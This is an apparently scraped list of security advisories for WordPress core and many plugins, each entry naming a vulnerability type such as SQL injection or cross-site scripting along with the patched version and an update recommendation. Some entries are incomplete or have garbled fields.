Vulnerability: Missing Authorization in ‘wpmsGGSaveInformation’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Core: WordPress

Vulnerability: Security Misconfiguration with URL Hostnames
Patched Version: 3.7.26
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.26, 3.8.26, 3.9.24, 4.0.23, 4.1.23, 4.2.20, 4.3.16, 4.4.15, 4.5.14, 4.6.11, 4.7.10, 4.8.6, 4.9.5

Plugin: CSV Import Export

Plugin: Database Manager – WP Adminer

Vulnerability: Information Exposure
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Log Reset
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: Page Builder by SiteOrigin

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: 2.10.16
Recommended Action: Update to version 2.10.16, or a newer patched version

Plugin: FLASH PLAYER PLUGIN

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: No subtitle
Patched Version: 7.8.8
Recommended Action: Update to version 7.8.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Shortcode Brackets
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: wordpress publish post email notification

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.2.3
Recommended Action: Update to version 1.0.2.3, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via ‘adminhash’
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: SQL Injection
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Drag and Drop Multiple File Upload for WooCommerce

Vulnerability: Cross-Site Request Forgery in upload and delete_file
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.5.31
Recommended Action: Update to version 1.5.31, or a newer patched version

Plugin: Widgets for Google Reviews

Vulnerability: Cross-Site Request Forgery to Plugin Settings Reset
Patched Version: 10.9.1
Recommended Action: Update to version 10.9.1, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Unauthenticated Insecure Direct Object Reference to Sensitive Information Disclosure
Patched Version: 5.5.1
Recommended Action: Update to one of the following versions, or a newer patched version: 5.5.1, 5.6.3, 5.7.1, 5.8.2, 5.9.1, 6.0.1, 6.1.1, 6.2.1, 6.3.1, 6.4.4, 6.5.2, 6.6.1, 6.7.1, 6.8.1, 6.9.1, 7.0.3, 7.1.1, 7.2.1, 7.3.1, 7.4.1

Plugin: Editable Table Simple Fast FrontEnd From Sql tables

Plugin: WP-Cron Dashboard

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: salesking

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: MkRapel Regiones y Ciudades de Chile para WC

Vulnerability: Cross-Site Request Forgery via multiple functions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Content Copy Protection & No Right Click

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Link2Player

Plugin: WC Fields Factory

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Child Theme Creator by Orbisius

Vulnerability: Arbitrary File Write
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Scroll To Top

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP-Lister Lite for eBay

Vulnerability: Reflected Cross-Site Scripting via ‘s’
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Woocommerce Products Designer by ORION – online product customizer for t-shirts, print cards, phone cases Lettering & Decals

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: 4.0.3
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: share-this

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.0.6
Recommended Action: Update to version 7.0.6, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 9.5.2
Recommended Action: Update to version 9.5.2, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Arbitrary Usermeta Update to Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.6.14
Recommended Action: Update to version 1.6.14, or a newer patched version

Plugin: NS Coupon To Become Customer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: sem-wysiwyg

Plugin: mm-forms-community

Vulnerability: Arbitrary File Upload
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: PDF24 Articles To PDF

Plugin: System Dashboard

Vulnerability: Missing Authorization to Information Disclosure (sd_global_value)
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Server-Side Request Forgery
Patched Version: 1.9.10.69
Recommended Action: Update to version 1.9.10.69, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Authenticated CSV Injection
Patched Version: 9.7
Recommended Action: Update to version 9.7, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Request Forgery to Arbitrary Member Deletion
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: Float to Top Button

Plugin: Soundy Background Music

Plugin: Login with phone number

Vulnerability: Cross-Site Request Forgery to User Password Change
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: WP-Cirrus

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.0.77
Recommended Action: Update to version 1.0.77, or a newer patched version

Plugin: JTRT Responsive Tables

Vulnerability: SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.4.1
Recommended Action: Update to version 0.9.4.1, or a newer patched version

Plugin: Google Map Generator

Plugin: Custom Search by BestWebSoft – Advanced WordPress Search Bar Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.36
Recommended Action: Update to version 1.36, or a newer patched version

Plugin: CBX Currency Converter

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Leakage/Changes
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: CorreosExpress – Shipping Management – Tags

Vulnerability: Sensitive Data Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Indeed Job Importer

Plugin: Bulk Delete Users by Email

Plugin: Smart External Link Click Monitor [Link Log]

Vulnerability: HTTP Response Splitting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: WP Edit Menu

Plugin: Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 4.3.45
Recommended Action: Update to version 4.3.45, or a newer patched version

Plugin: Who Hit The Page – Hit Counter

Plugin: WDContactFormBuilder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Enhanced WP Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Donation Plugin and Fundraising Platform <= 2.5.0
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Email Forgery
Patched Version: 4.5.6
Recommended Action: Update to version 4.5.6, or a newer patched version

Plugin: fbgorilla

Plugin: Organizer

Vulnerability: Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Missing Authorization on ‘load_recaptcha_preview’ AJAX function
Patched Version: 1.23.3
Recommended Action: Update to version 1.23.3, or a newer patched version

Plugin: Alkubot – Gamify discounts, sell more and give less at the right time

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Post/Page Deletion
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Insert Html Snippet

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Core: WordPress

Vulnerability: IP Address Spoofing
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Kioskprox

Plugin: Accessibility Suite by Ability, Inc

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.12
Recommended Action: Update to version 4.12, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘instantEditRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Unspecified Vulnerability
Patched Version: 2.0.23
Recommended Action: Update to version 2.0.23, or a newer patched version

Plugin: Event List

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 0.7.9
Recommended Action: Update to version 0.7.9, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Add Subtitle

Plugin: Donations

Plugin: Ultimate Addons for Elementor

Vulnerability: Registration Bypass
Patched Version: 1.24.2
Recommended Action: Update to version 1.24.2, or a newer patched version

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.5.7.7
Recommended Action: Update to version 1.5.7.7, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery via delete()
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: Cleverwise Daily Quotes

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization
Patched Version: 5.6.7
Recommended Action: Update to version 5.6.7, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.6
Recommended Action: Update to version 1.10.6, or a newer patched version

Core: WordPress

Vulnerability: Password Reset Link Non-Expiration
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Stored Cross-Site Scripting
Patched Version: 10.16
Recommended Action: Update to version 10.16, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Information disclosure
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Easy Call With Twilio

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Count per Day

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 2.46.1
Recommended Action: Update to version 2.46.1, or a newer patched version

Plugin: Vimeotheque: Vimeo WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting via ‘view’ and ‘page’
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Subscriber+) PHP Object Injection
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: WP-FormAssembly

Vulnerability: Authenticated (Contributor+) Arbitrary File Read
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Hitsteps Web Analytics

Vulnerability: Cross-Site Request Forgery via hst_optionpage
Patched Version: 5.87
Recommended Action: Update to version 5.87, or a newer patched version

Plugin: Super Progressive Web Apps

Vulnerability: Missing Authorization
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Finale Lite – Sales Countdown Timer & Discount for WooCommerce

Vulnerability: Missing Authorization to Content Deletion
Patched Version: 2.17.0
Recommended Action: Update to version 2.17.0, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 5.6.6
Recommended Action: Update to version 5.6.6, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: cformsII

Plugin: Clio Grow Form

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Fathom Analytics for WP

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.0.1
Recommended Action: Update to version 1.2.0.1, or a newer patched version

Plugin: Variation Swatches for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: vSlider Multi Image Slider for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Editor

Vulnerability: Incorrect Permission Assignment or Protection
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-domain Flash injection
Patched Version: 3.7.25
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.25, 3.8.25, 3.9.24, 4.0.22, 4.1.22, 4.2.19, 4.3.15, 4.4.14, 4.5.13, 4.6.10, 4.7.9, 4.8.5, 4.9.2

Plugin: FormCraft – Form Builder

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: HTML2WP

Plugin: Visibility Logic for Elementor

Vulnerability: Missing Authorization via admin_post ‘toggle_option’
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 1.1.82
Recommended Action: Update to version 1.1.82, or a newer patched version

Plugin: google-analytics-premium

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.15
Recommended Action: Update to version 8.15, or a newer patched version

Plugin: Pondol Form to Mail

Plugin: 多合一搜索自动推送管理插件-支持Baidu/Google/Bing/IndexNow/Yandex/头条

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.62
Recommended Action: Update to version 6.62, or a newer patched version

Plugin: Sell Downloads

Vulnerability: Arbitrary File Read
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Widget Responsive for Youtube

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Infogram – Add charts, maps and infographics

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Contact Form Clean and Simple

Vulnerability: Cross-Site Scripting
Patched Version: 4.4.1
Recommended Action: Update to version 4.4.1, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: SQL Injection
Patched Version: 9.0.3
Recommended Action: Update to version 9.0.3, or a newer patched version

Plugin: AI Powered Starter Templates by Kadence WP

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Form builder to get in touch with visitors and grow your email list — Happyforms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Blocks
Patched Version: 1.22.0
Recommended Action: Update to version 1.22.0, or a newer patched version

Plugin: Realteo

Vulnerability: Missing Authorization
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Lara's Google Analytics (GA4)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Customizer Export/Import

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Local/Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popular Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Core: WordPress

Vulnerability: Username Enumeration
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: CSV Injection
Patched Version: 1.12.22
Recommended Action: Update to version 1.12.22, or a newer patched version

Plugin: avalex – Automatisch sichere Rechtstexte

Vulnerability: Missing Authorization
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Online Booking & Scheduling Calendar for WordPress by vcita

Vulnerability: Missing Authorization to Account Logout
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: WP Chat App

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.8.1.2
Recommended Action: Update to version 5.8.1.2, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: HTML Injection in Emails
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated Remote Code Execution
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Custom Fields Search by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: The Events Calendar: Eventbrite Tickets

Vulnerability: Cross-Site Scripting
Patched Version: 3.10.2
Recommended Action: Update to version 3.10.2, or a newer patched version

Plugin: WP Voting Contest Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Privilege Escalation
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: 404 Solution

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.33.1
Recommended Action: Update to version 2.33.1, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Multiple Admin+ Stored Cross-Site Scripting
Patched Version: 5.4.1
Recommended Action: Update to version 5.4.1, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Subscriber+ Arbitrary Country Ban
Patched Version: 2.26.5
Recommended Action: Update to version 2.26.5, or a newer patched version

Plugin: Plugin: Newsletter

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: WordThumb

Plugin: Related Posts by Zemanta

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Coming Soon Page & Maintenance Mode

Vulnerability: Stored Cross Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: ACF to REST API

Vulnerability: Insecure direct object reference via permalinks manipulation
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Aruba HiSpeed Cache

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: xPinner Lite

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.1
Patched Version: 6.4.2
Recommended Action: Update to version 6.4.2, or a newer patched version

Plugin: MainWP Dashboard: WordPress Management without the SaaS

Vulnerability: Authenticated(Administrator+) CSS Injection
Patched Version: 4.5.1.3
Recommended Action: Update to version 4.5.1.3, or a newer patched version

Plugin: WP TFeed

Vulnerability: Cross-Site Request Forgery via aptf_delete_cache
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TheCartPress eCommerce Shopping Cart

Plugin: پلاگین پرداخت دلخواه

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Active Products Tables for WooCommerce. Use constructor to create tables

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Cardoza AJAX Search

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Read More & Accordion

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: GamiPress – Vimeo integration

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP-Appbox

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.3.21
Recommended Action: Update to version 4.3.21, or a newer patched version

Plugin: Marmoset Viewer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Child Theme Generator

Plugin: Direct Checkout for WooCommerce – Skip Cart with Buy Buttons

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: WP Helper Premium

Vulnerability: Cross-Site Request Forgery via whp_fields
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Page Generator

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Stored Cross Site Scripting via lastName
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: WebLibrarian

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.8.5
Recommended Action: Update to version 3.4.8.5, or a newer patched version

Plugin: JetElements

Vulnerability: Authenticated (Contributor+) Remote Code Execution
Patched Version: 2.6.11
Recommended Action: Update to version 2.6.11, or a newer patched version

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.9.35.1
Recommended Action: Update to version 4.9.35.1, or a newer patched version

Plugin: DOOFINDER Search and Discovery for WP & WooCommerce

Vulnerability: Unauthenticated Open Redirect
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: Keep Backup Daily

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: iframe

Vulnerability: Authenticated Stored Cross Site Scripting
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Weaver Xtreme Theme Support

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.2.7
Recommended Action: Update to version 6.2.7, or a newer patched version

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Authenticated SQL Injection via Settings Import
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: Email Before Download

Vulnerability: SQL Injection
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: PHP Objection Injection
Patched Version: 2.10.7
Recommended Action: Update to version 2.10.7, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Matterport Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Unauthorised Event TimeSlot Deletion
Patched Version: 2.4.2
